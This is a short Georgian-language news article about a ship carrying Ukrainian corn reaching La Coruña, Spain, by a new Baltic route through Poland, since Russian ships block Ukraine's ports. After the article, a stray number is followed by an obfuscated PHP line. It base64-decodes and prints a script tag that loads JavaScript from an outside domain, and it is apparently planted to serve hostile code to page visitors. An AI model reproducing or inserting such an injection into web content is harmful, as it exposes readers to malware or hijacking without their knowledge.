celsiusi
ავერსი შნაიდერი
ახალი მარშრუტის გამოყენებით ესპანეთში უკრაინული მარცვლეულით დატვირთული გემი ჩავიდა. ინფორმაციას „სიენენი“ ავრცელებს.
 
როგორც „სიენენი“ წერს, ესპანეთის ქალაქ ლა კორუნიას პორტში განაცხადეს, რომ დღეს 18 ათასი ტონა სიმინდით დატვირთული გემი ჩავიდა, რომლის ჩამოტვირთვა ხვალ იგეგმება.
 
ცხოველთა საკვების მწარმოებელთა ჯგუფის Agafac-ის განცხადებით, მარცვლეულის ჩატანა ახალი მარშრუტით, ბალტიის ზღვის გამოყენებით მოხერხდა, რადგან რუსულ ხომალდებს დაბლოკილი აქვთ უკრაინული პორტებისკენ მიმავალი გზები სრულმასშტაბიანი ომის დაწყების შემდეგ. Agafac-ის დირექტორის, ბრუნო ბიდის განცხადებით, სიმინდი უკრაინიდან სატვირთოებით გაიტანეს რუმინეთის და პოლონეთის გავლით. სატვირთო გემი Alppila კი ბალტიის ზღვაზე მდებარე პოლონეთის პორტ სვინოუისცეში დაიტვირთა მარცვლეულით.
 
მანამდე, უკრაინის საგარეო საქმეთა მინისტრის მოადგილემ, დმიტრო სენიკმა განაცხადა, რომ რუმინეთთან, პოლონეთთან და ბალტიის ქვეყნებთან ერთად იგეგმება ახალი მარშრუტების შექმნა, რათა მოხდეს უკრაინის მარაგებში არსებული 22 მილიონის მარცვლეულის გატანა.
675
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");